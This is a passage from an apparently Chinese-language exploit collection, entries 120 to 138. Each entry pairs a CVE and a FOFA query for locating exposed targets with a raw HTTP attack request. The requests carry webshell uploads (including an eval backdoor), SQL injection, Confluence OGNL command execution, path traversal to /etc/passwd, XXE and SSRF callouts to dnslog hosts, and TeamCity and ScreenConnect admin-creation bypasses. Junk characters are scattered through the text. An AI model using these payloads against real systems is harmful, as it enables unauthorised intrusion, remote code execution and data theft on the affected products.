6 }8 t: B) K# G& k, x9 AX-Originating-Ip: 1.1.1.1, J" \. J0 [" Z' k3 j- |' A( @ ?, w
X-Remote-Ip: 1.1.1.1
8 Q. |& X4 I+ JX-Remote-Addr: 1.1.1.1
3 |, I. a9 R. S) X# Y$ v4 iTe: trailers
) N/ ^) ~+ @ q4 h3 qConnection: close
, Q4 p8 P' W$ @$ ?$ X# X1 a, a: D1 {" a) }* ?/ J" }
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
# @' ~; b8 r* y9 q0 q. N8 ~+ h* J! }. E/ T4 W: i8 m) Z
$ U# I. t/ R. I" V* N/ |9 U
120. 北京百绰智能S40管理平台导入web.php任意文件上传
7 p; w$ f& S/ ?( JCVE-2024-1253; v0 l4 W$ H( O
FOFA:title="Smart管理平台"
! p7 g1 U) Y) z/ }1 L+ T, X1 KPOST /useratte/web.php? HTTP/1.15 p2 u6 \. V$ E6 e: B: Z v+ ?
Host: ip:port" M- \, H; y \* ], W
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
; ~0 s8 R5 f7 t1 CUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
: `; `- Q5 X3 i1 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 C8 s& p- p- ~$ ~) l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 F/ s3 h7 A# e6 }+ v% ^( |% n% h6 GAccept-Encoding: gzip, deflate# J& H" g% t4 F. }% A' C4 p
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793287 S) S9 |+ X/ }0 R' T2 f/ W
Content-Length: 597
" _8 Z: ~2 m% ]8 b* p5 |Origin: https://ip:port6 \# V( F! a; B% C; Q' n6 G
Referer: https://ip:port/sysmanage/licence.php7 H% @& w( v/ A; \% ]/ t2 }
Upgrade-Insecure-Requests: 1
N4 k) g B, I# w! _- ?* uSec-Fetch-Dest: document
5 b! N: S" a3 `Sec-Fetch-Mode: navigate
, ~6 q0 p( O; X4 o8 I/ d: a# u/ ISec-Fetch-Site: same-origin0 R0 [& h7 Y& f: c, z
Sec-Fetch-User: ?1
6 y$ A7 I; _2 t3 o( S, bTe: trailers
+ A3 v, N2 q# _" IConnection: close5 b- C' ]. l5 S1 c
# [/ c" h& z9 `3 S$ e6 e-----------------------------42328904123665875270630079328
% t6 I# g- n. I0 z+ mContent-Disposition: form-data; name="file_upload"; filename="2.php"5 T r& C3 P; Z1 h6 x: }
Content-Type: application/octet-stream
& y1 S. [) _/ l; f, M/ e0 i$ c8 J1 X6 @
<?php phpinfo()?>& R/ ^ F) d/ k9 K; r
-----------------------------42328904123665875270630079328( x: q1 b) f' ~: p6 C# \
Content-Disposition: form-data; name="id_type"
' ?% Z2 s5 H# L0 z. Q" M$ I
) t% J, y# ?! Q N7 ^+ N& G1
7 [7 K0 h. H6 p) p-----------------------------42328904123665875270630079328
' w. x6 l- K- f8 k6 w: OContent-Disposition: form-data; name="1_ck"
% [) R' T9 K) t/ v' [" s
$ Z/ o2 b1 l' |5 Y# K' U" J1_radhttp6 x# j# P5 [! s* W7 n, w2 y- P
-----------------------------42328904123665875270630079328. _+ d$ N2 u1 S: g6 V/ X, V
Content-Disposition: form-data; name="mode". k# c+ Z. L1 Y+ U, G
. W# R2 r1 a1 c. }- p5 d" Cimport
1 @1 S5 T& s4 x( O% q; \" G" L-----------------------------42328904123665875270630079328
4 e- E2 Z5 E4 x4 f4 Z+ w4 y/ |4 X' p8 J
$ D" X( h3 I y9 s: `" R8 c文件路径/upload/2.php" G* D1 n2 r/ l& _
& k% m' ?0 O1 R( g y8 f0 w H" \/ K. x121. 北京百绰智能S42管理平台userattestation.php任意文件上传
; G9 }. F" d3 T [! XCVE-2024-1918
* O" c1 @( ^0 d- d* }1 v* TFOFA:title="Smart管理平台"
D9 @9 U Q' b- NPOST /useratte/userattestation.php HTTP/1.1
; ~3 L8 z8 c$ F: W! C" g6 b5 JHost: 192.168.40.130:8443
% \! K5 \! T, O& \7 _( J( @* j" SCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
& @% h; @* H3 {& HUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko1 A: K7 C% t- w9 I5 j3 }! K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ ]8 H a+ t- |8 k0 N" f" G& X& OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( A6 e. p! z8 I2 ^) q
Accept-Encoding: gzip, deflate
8 L6 u/ I) L: J( U& RContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328* n$ C, Y4 \& g" M* X( l
Content-Length: 5927 G* Z5 w. c9 }6 ^* H5 I
Origin: https://192.168.40.130:8443
. O8 t% ]- d. O& e! q5 oUpgrade-Insecure-Requests: 1
: }: c: C- W' I7 O7 J* v# sSec-Fetch-Dest: document
7 U/ W' \; ^7 pSec-Fetch-Mode: navigate3 M5 u4 K# o" Q! ~ \
Sec-Fetch-Site: same-origin4 e$ t# L* e O7 k7 P$ ]2 a0 ?
Sec-Fetch-User: ?1. p2 q3 Q1 I) U
Te: trailers/ ~6 i6 K3 P8 ^
Connection: close" M# v- ^( K/ h: g& s/ S) u
. P4 _* T7 U9 x+ ~8 h9 d
-----------------------------42328904123665875270630079328( W: U% E: F1 _+ W! u8 _
Content-Disposition: form-data; name="web_img"; filename="1.php"
; Y; a. W6 n: c! P% qContent-Type: application/octet-stream
# b' t+ d0 g: r! _ e& \& _- U: ?9 m1 L/ v7 b$ i
<?php phpinfo();?>
2 M; T: I9 a6 G% j8 ]# \! e-----------------------------42328904123665875270630079328
+ w, Y6 w! C* {) N2 e2 K( AContent-Disposition: form-data; name="id_type"0 r% l, r4 h) j5 l( v. V
; S* U( u. [6 h" ^- e) ]& t1
5 W! j) O! L, s! a+ C& v2 m-----------------------------42328904123665875270630079328/ m+ [% N5 j* W; Y/ v9 \
Content-Disposition: form-data; name="1_ck"2 \. ^8 e$ i+ W, P
9 f/ O9 W6 R9 _4 y
1_radhttp% _$ r$ r9 N8 ~8 d
-----------------------------42328904123665875270630079328
7 G. }; V% z/ u/ {6 t3 bContent-Disposition: form-data; name="hidwel"
}0 U' _# J' p1 V9 W! y' j2 y4 h7 w) G2 a& V
set
6 x) i# \' n+ ]! P* e T/ x- Q2 g$ m-----------------------------423289041236658752706300793284 k, C; u- W Q; o
5 J7 D* g7 ?3 {, N, W E2 i1 M
4 c3 e* g0 w/ [( Y! v; jboot/web/upload/weblogo/1.php6 M' k- C, |- m
# L" V/ I* n& X* m) |. h, K' q
122. 北京百绰智能s200管理平台/importexport.php sql注入
! `1 D5 N) Q' ` q" U$ U$ VCVE-2024-27718FOFA:title="Smart管理平台"
2 H( {# J9 c* Y* t其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
" f7 {1 F& Z C5 X! ]GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
- O) d: G* |9 Y% ^- q- vHost: x.x.x.x6 ^4 i4 C% I" l( U
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
2 M4 `: f; @: j, L3 a3 f8 [, SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 Y5 l; t: N" k$ i. Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' A+ p3 u4 }: o1 J6 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* o2 l7 q; y& G6 m5 M! O
Accept-Encoding: gzip, deflate, br
u# I2 t/ v! {1 Q, S% [5 S5 ~Upgrade-Insecure-Requests: 1
# a! Y' `0 ?3 J* S5 ~: tSec-Fetch-Dest: document0 s) w! E. M4 c8 r. ]
Sec-Fetch-Mode: navigate% x: U* M: a! p0 o% @" s( e: Z
Sec-Fetch-Site: none' p- r1 I( J% Y0 b
Sec-Fetch-User: ?1
" t' ^9 K: x q" W/ V) t1 {* xTe: trailers3 q$ k! l8 ~8 |& Y$ p0 p
Connection: close1 A4 C% W) t/ K+ I' x
. K% v7 m% ?2 f1 n, m/ T0 @5 b% X
# t5 z f) Y( V1 }8 A0 x123. Atlassian Confluence 模板注入代码执行$ I( m0 x/ j0 d
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"; t. U2 b, }- k
POST /template/aui/text-inline.vm HTTP/1.12 ^! f! n! ~$ X+ M; b! q
Host: localhost:8090
. c$ W! N, J$ HAccept-Encoding: gzip, deflate, br* H" {$ \+ H( L4 V9 ?7 e$ w9 U. @
Accept: */*2 E; O6 |# @5 H/ h
Accept-Language: en-US;q=0.9,en;q=0.8
( d5 c/ g$ B! e# f0 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
; ^% ~; Q h4 zConnection: close* I i& J' M3 |' E/ t8 ]
Content-Type: application/x-www-form-urlencoded! q Q" c4 }/ s0 M" h6 k U" q
4 q( e# y9 v$ Ylabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))( T; e; b6 V r
/ f# l; D1 p& b* U0 R- B. `9 a
! ?! w+ c! C$ G1 P9 i) U: ]7 e# S2 P; q( N124. 湖南建研工程质量检测系统任意文件上传6 L9 S# W" v+ u& d+ Z( B9 [
FOFA:body="/Content/Theme/Standard/webSite/login.css"
6 e/ o0 A5 ?' _4 \8 d9 KPOST /Scripts/admintool?type=updatefile HTTP/1.1
/ ]( z, w2 @ ?0 \* y) w; i3 s5 {4 YHost: 192.168.40.130:8282
, F- M% y1 G# t! O/ l( V; @User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
. p' c# _, v3 s4 A3 U! K+ OContent-Length: 72/ J. m, _0 R! o& }1 Z3 \9 F S2 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
: z: T- b' P/ g, JAccept-Encoding: gzip, deflate, br
0 \+ k. H9 H1 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* g. {- Q% d" T5 NConnection: close
1 ]' L7 _& V2 \# bContent-Type: application/x-www-form-urlencoded. ]8 g Z5 Z S
8 i; R5 x: J% Z+ i7 U' d1 F9 Q
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
3 Z: `8 @& D- V/ H/ c0 o
+ X; \( a! I5 w0 ~7 E2 b" `! P7 E* H9 V, D& I. W& t7 ` Y
http://192.168.40.130:8282/Scripts/abcgcg.aspx
: i7 Z. {1 o: _6 d$ D+ q* O6 Z% V* ?5 N0 n- y6 ]$ _
125. ConnectWise ScreenConnect身份验证绕过
: b( I7 V- P, M7 _ B: eCVE-2024-1709
# H* q+ M6 [9 ?' a" j$ ~* X7 xFOFA:icon_hash="-82958153"6 ?) a7 G! x+ j' `8 n- F
https://github.com/watchtowrlabs ... bypass-add-user-poc. e7 t5 ^. z3 ]8 k
* s x# O c8 p/ V7 b8 D+ F' Z5 o% q( _8 e4 b: Q6 ~
使用方法* p7 K x* |; o9 n; \/ b% u
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!4 N. Q7 z3 x. d; A( Z. V
1 X9 L. ^$ s( R
1 n7 }$ J+ B' f ?
创建好用户后直接登录后台,可以执行系统命令。) l3 ~. A5 v8 z( \1 a
P1 k" R0 ~9 G, N126. Aiohttp 路径遍历
8 t4 N( E3 h8 A' ~FOFA:title=="ComfyUI"( `. O1 y" P5 K6 @# B8 Z, ]! F8 Y( c
GET /static/../../../../../etc/passwd HTTP/1.18 o' l0 K) \: e& D' w5 s& ~
Host: x.x.x.x
* |$ U# j8 H# Q6 x) BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
# x3 Y& w8 p& s! M4 e Y$ XConnection: close
& K k R; D0 [7 K0 |Accept: */*0 Q' s$ j. h8 Q+ y
Accept-Language: en8 D9 O% I" T; G. A- E
Accept-Encoding: gzip
% M" I+ C( b" Y* E1 ]
+ e% H1 p9 `4 u6 j/ G0 f M8 [% v" `! s8 @2 W8 i- [. y( f
127. 广联达Linkworks DataExchange.ashx XXE
! j% [ V1 F6 ?- _1 T% lFOFA:body="Services/Identification/login.ashx" 0 s$ h7 Y. `" t; o* K
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1* a" p8 [4 H- h! y, l' f7 ]' G$ n
Host: 192.168.40.130:88885 g2 e- X8 L8 w' v4 ~* n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
5 _& j; g% J9 X7 a3 m3 }Content-Length: 415
' N4 _ @& k$ B6 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) n0 Q) d( x9 b$ AAccept-Encoding: gzip, deflate
( _. V# F, W& p: t3 M. L- _5 nAccept-Language: zh-CN,zh;q=0.9
& e& s2 x# I4 [' v$ _" H# L3 |9 k! s0 kConnection: close% X0 f1 e; u' B
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0' H# s$ \) u2 n/ V: {& M9 [6 ]
Purpose: prefetch h- C8 [0 T: \2 x
Sec-Purpose: prefetch;prerender
7 T; Y' l- H' K/ n. H! ~7 B* `3 d- l+ O1 ]+ L
------WebKitFormBoundaryJGgV5l5ta05yAIe09 M) E0 |# d" n u
Content-Disposition: form-data;name="SystemName"/ f$ V) Y2 v" F5 s1 \7 \
7 r( r4 |1 n7 m7 dBIM
+ f& I2 n# q# r8 U' Q1 k' S- X: Y! v------WebKitFormBoundaryJGgV5l5ta05yAIe0
- r2 l: ], t+ zContent-Disposition: form-data;name="Params", O( ?: x. G: k4 F6 o
Content-Type: text/plain
1 t2 ?- A$ H& {, u! _
/ R. {4 f# w- I<?xml version="1.0" encoding="UTF-8"?>
; L k6 M& P# Z<!DOCTYPE test [3 \4 o* }: C6 N3 X% z5 g3 h+ N
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
! g3 a+ t; _# t9 p- _, P. F" |8 []
6 e7 H! t. f0 ~+ g; x2 F>
7 b. d% }4 E4 J2 B0 x0 r, l<test>&t;</test>+ e4 Z0 Y/ n$ y6 D5 ~1 A8 X
------WebKitFormBoundaryJGgV5l5ta05yAIe0--& a# h9 Q( T) z4 V8 {* {/ [
F: p! R. s: D1 O
- w* a+ S6 Z6 U1 D8 Q, q# R& p$ \% D
128. Adobe ColdFusion 反序列化
% b% R- @) _4 _! _! Z$ Q! MCVE-2023-382036 U# M+ I; L, h- j1 F
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)8 O9 I+ d- I! T+ O7 U
FOFA:app="Adobe-ColdFusion"4 N) Y2 W1 L7 C7 J5 X6 L
PAYLOAD5 W# [6 x) q% r5 x6 d. ~1 R' d& W
( @( _1 w# S6 _4 ~/ k3 B
129. Adobe ColdFusion 任意文件读取/ H: A0 B' f$ u& k& J; z* W2 z
CVE-2024-20767- k' K0 |' M: l: Q
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"3 N% j5 `) {) j& W4 c
第一步,获取uuid% O( @9 {$ H6 R/ L/ D: t/ M, D5 |
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
. x& _# \) E+ F# f% kHost: x.x.x.x. |+ o- B$ r; F. N: T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36/ t# L8 M& t/ ]
Accept: */*
- u E4 V& l7 e& x6 \0 Y6 pAccept-Encoding: gzip, deflate
1 h6 I& f5 Y- Z; X# TConnection: close
$ N( Y G2 W. ~) O [3 P4 j5 Z6 O5 B! ]
: k; E! y7 n! E! y& Q
第二步,读取/etc/passwd文件
4 C2 d" H8 c5 q: J; G+ NGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.15 t d- d3 X6 @# `' T2 a1 k
Host: x.x.x.x
/ Y. y) G& g0 a$ {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
; p. e/ f1 m& b# [Accept: */*! U3 D9 _' H% T3 |
Accept-Encoding: gzip, deflate) B: w6 o! {$ t5 D/ [) ]2 b2 M
Connection: close+ N4 _- t G2 u% J) M5 @1 H) t, L
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
) Y/ s0 ~' T, F: {1 |" ~# A# T2 [* D" Y4 l' v D
" c& L& A+ }! u$ i9 t
130. Laykefu客服系统任意文件上传6 O2 d7 f; T4 q( C
FOFA:icon_hash="-334624619"
: |; C* c; A) \8 W9 N4 bPOST /admin/users/upavatar.html HTTP/1.1
1 E5 Z: q6 x7 C) K! LHost: 127.0.0.1+ r; B* u9 N% \ Q8 W
Accept: application/json, text/javascript, */*; q=0.018 ?! c2 ]' c) t: X$ ~
X-Requested-With: XMLHttpRequest
) O% ]" x$ P; ?( l5 }User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
: x( O: [& I) L+ C u; |1 a8 ?9 zContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
9 Z' H. c$ b) F2 q1 ~Accept-Encoding: gzip, deflate6 u+ d- q9 L. |; J, K
Accept-Language: zh-CN,zh;q=0.9
4 x9 G9 I9 y, N9 w/ ?Cookie: user_name=1; user_id=3
+ d! t$ u8 I2 JConnection: close$ n. P; w. g- k. `
5 S- ~ U9 }' [) v/ R5 ]------WebKitFormBoundary3OCVBiwBVsNuB2kR$ w$ w, k% q4 V0 | F( ]; J
Content-Disposition: form-data; name="file"; filename="1.php"1 n4 m( e5 [6 `, r
Content-Type: image/png. r" u! e6 |/ I' D8 v
2 i! E4 ^) V- o$ f% ]" o/ a/ p( d<?php phpinfo();@eval($_POST['sec']);?>9 v6 J1 [$ N) B5 T- ^) A0 H+ c
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
' ]5 q6 q. ?& f( @: D$ k) G) ~7 n* g
/ U, y: i- i! q, H8 i
131. Mini-Tmall <=20231017 SQL注入( }) t- B- _" u/ z+ {9 n
FOFA:icon_hash="-2087517259"
9 K4 @" g5 ], S8 n后台地址:http://localhost:8080/tmall/admin
7 d5 p! y {8 N( }. uhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
~! B1 C+ k+ e( Z/ x! ^( X5 J+ T6 U# q! ~
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过0 _; t' @& u5 u: C+ O( F8 Z
CVE-2024-27198$ W3 }* [, _4 Z+ s
FOFA:body="Log in to TeamCity"3 F$ @8 a. }+ O. i% V& o
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
3 o% D/ c4 v% Y: Y# JHost: 192.168.40.130:8111
- k8 A3 r9 s9 X' VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.363 D! z4 y7 [7 q: m( j0 }7 y
Accept: */*
6 V5 ?" Q' W0 p* J# V+ \# tContent-Type: application/json" l2 o" x8 @/ }( P0 v6 g# v
Accept-Encoding: gzip, deflate
2 r5 {1 r# ^' x* q" V) a! f2 l+ n: v7 _% W
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}. `1 L9 x) m+ r6 X) V5 b
' D1 p8 Q, j- ^# R3 g5 Q9 _8 A. {: L, c a/ h
CVE-2024-27199' Z1 D" Z7 a8 v" f& E* k
/res/../admin/diagnostic.jsp) e2 \8 k. R8 {! i5 O6 D& P
/.well-known/acme-challenge/../../admin/diagnostic.jsp+ P" D6 c4 U2 v( y# b
/update/../admin/diagnostic.jsp
9 V& B) Y6 c, g
, c4 B! q' p8 }8 `) g n( p2 |) d/ M$ l2 @
CVE-2024-27198-RCE.py
3 k ~5 _+ R* l0 h; ~
( R- v4 i5 O) R133. H5 云商城 file.php 文件上传
6 O' J3 \2 X i, d) K0 P$ CFOFA:body="/public/qbsp.php"- G8 ^$ P# `, E" R8 f2 l
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1* h7 f# ?6 a! V* X$ x4 R- H2 y8 c% i
Host: your-ip6 l' w3 a2 {- I' x- k+ s: D+ u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 h2 [; t; H7 w" M9 HContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
& v5 e& m* N6 b# ^
. c( d5 Z& b' g- x& H! f' `& G------WebKitFormBoundaryFQqYtrIWb8iBxUCx, \0 f+ X' o# T, {2 v
Content-Disposition: form-data; name="file"; filename="rce.php"
" D0 j; ^: D: C' OContent-Type: application/octet-stream! Z; |1 V1 \" z- K2 |4 ^) k7 G9 @
7 k P. Y9 j" o3 A. s<?php system("cat /etc/passwd");unlink(__FILE__);?>2 {7 G# Q) }# ]4 v7 j4 s
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
: k# p) W- d& Q4 O/ B, ]" Y$ ?
9 w* D/ I" T$ n* r' @5 K0 Z8 g6 z$ a' D0 t( S; s$ v3 O' A# ]
. q% F, @: R3 L& H
134. 网康NS-ASG应用安全网关index.php sql注入
+ v6 x9 g% e: {. Z! a$ O* A/ Z8 NCVE-2024-23306 X0 q0 H" u% j. U
Netentsec NS-ASG Application Security Gateway 6.3版本/ C% r4 P% I3 a
FOFA:app="网康科技-NS-ASG安全网关"
$ |: r* h5 _* U) |- Z* v' DPOST /protocol/index.php HTTP/1.1
' u0 _2 v [& B& L7 J% K: f+ AHost: x.x.x.x8 T1 H4 m# v7 }+ ~9 B5 \ Z
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de/ S# |! v0 c5 {/ G( ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
) ?: q/ b9 X) Y# I) |5 o) c0 aAccept: */*5 F: j0 B p3 {) j+ u- D+ X" A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; K* A" A7 e8 |Accept-Encoding: gzip, deflate
! g1 s, V3 V2 D4 C" Q5 p& A0 C9 I! ESec-Fetch-Dest: empty3 {. @( |: M6 a1 X4 v7 N" M! ?" F1 S
Sec-Fetch-Mode: cors5 V* r4 a* c7 a8 M+ p2 H5 ]
Sec-Fetch-Site: same-origin
$ D' }1 Y0 P/ M6 ?1 E. ?Te: trailers
0 R( ^ d8 x6 q0 Y/ F1 YConnection: close
! E @( [% v% [$ L2 O% LContent-Type: application/x-www-form-urlencoded
: M& x" j' X, Z$ j, qContent-Length: 263$ H9 J" d2 l& O' B
7 K6 p. |, Q3 o* ~" a1 K8 H, n
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}3 c+ F6 ?/ S/ p+ E% Q
- B) S8 s9 t+ R4 r3 j- Q
* v9 w( Z+ Y, o) \/ C
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
7 V# _( J0 q7 h/ m, B" B ^ uCVE-2024-2022! Q1 [# d) U/ q$ p* j0 |3 [$ F; v
Netentsec NS-ASG Application Security Gateway 6.3版本
( ~4 k( W% ^+ o; N4 PFOFA:app="网康科技-NS-ASG安全网关"
- u" i9 q8 L/ J) e+ j: O5 [' gGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.10 y' |& o' x8 x. T
Host: x.x.x.x, k2 d: _4 z( L) ?; J6 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
3 k4 c& I. v, b8 g: R) @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 { e) X0 Q/ r2 ]- i$ }
Accept-Encoding: gzip, deflate9 C% S+ ~" H9 s; k6 V- \: _ A
Accept-Language: zh-CN,zh;q=0.9' u5 x) o1 W9 }4 U: l
Connection: close4 Z/ o0 E2 Q; N+ d) C6 F7 F
& O$ y- A- a+ ^/ g! @2 v
2 ?1 ]! Y' i7 J1 E4 f136. NextChat cors SSRF$ Q* n" R5 [$ P2 V
CVE-2023-49785: ~1 M7 C. D7 Z8 [- C3 r) N
FOFA:title="NextChat"
- ? H; [- B# U4 A5 z% RGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
- A' i( D; @5 D. Z& R# v0 M. ZHost: x.x.x.x:10000( Q4 l. n" q0 c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ s" n0 u' I/ {. \Connection: close
( s( h _+ [6 h |# V9 rAccept: */*' O# y" h- u2 ?1 S7 h
Accept-Language: en# \% y# e8 y: ~0 P. x6 _) X
Accept-Encoding: gzip+ {7 K6 d o, B/ C5 m* b, `5 F
; Y; f" P4 h; o3 `' K4 Z! h
9 z0 O. [9 j; Z) y: E6 x% A
137. 福建科立迅通信指挥调度平台down_file.php sql注入/ D( z& ^8 L6 c. q" V6 o
CVE-2024-2620# y# V- g1 |1 W
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台" l& Q7 F! `8 p# R2 ^/ o" S. k6 V
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1' ]$ N( l8 p; ?8 a! F6 f: g
Host: x.x.x.x
# V1 ^+ _2 K0 w, D0 L0 w; JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 t* [7 ?4 N; q. I7 f& \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 @, x' g1 z1 }8 m& h, U) C5 A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- V. {7 m7 Y$ |Accept-Encoding: gzip, deflate, br
* _, \8 \6 R9 s# uConnection: close) m# z. Y) U* s( z6 y4 o1 x
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
, y+ n, I9 J" _: g6 WUpgrade-Insecure-Requests: 1( [/ J% P# t$ L( ^
0 S }- J0 z+ I3 n1 }1 q6 `8 T5 L5 u3 r# V' N0 Q% S! w' [/ e! i
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
: J8 o3 u& U2 N+ W$ O+ C9 Z& Z! @CVE-2024-26218 Z$ H0 C/ I6 y/ X
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台" m" L9 Y' o l" k w" U( M6 a
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
& _- X" U$ f* A/ a9 C$ SHost: x.x.x.x8 u/ S) `8 G3 L4 \0 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# w/ s5 K) Y6 T) L* E4 o3 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* Z' A' C1 |+ t) xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 P1 O+ Y1 {/ m( r
Accept-Encoding: gzip, deflate, br- G0 J5 d4 N. @+ C0 a7 I: S: V
Connection: close
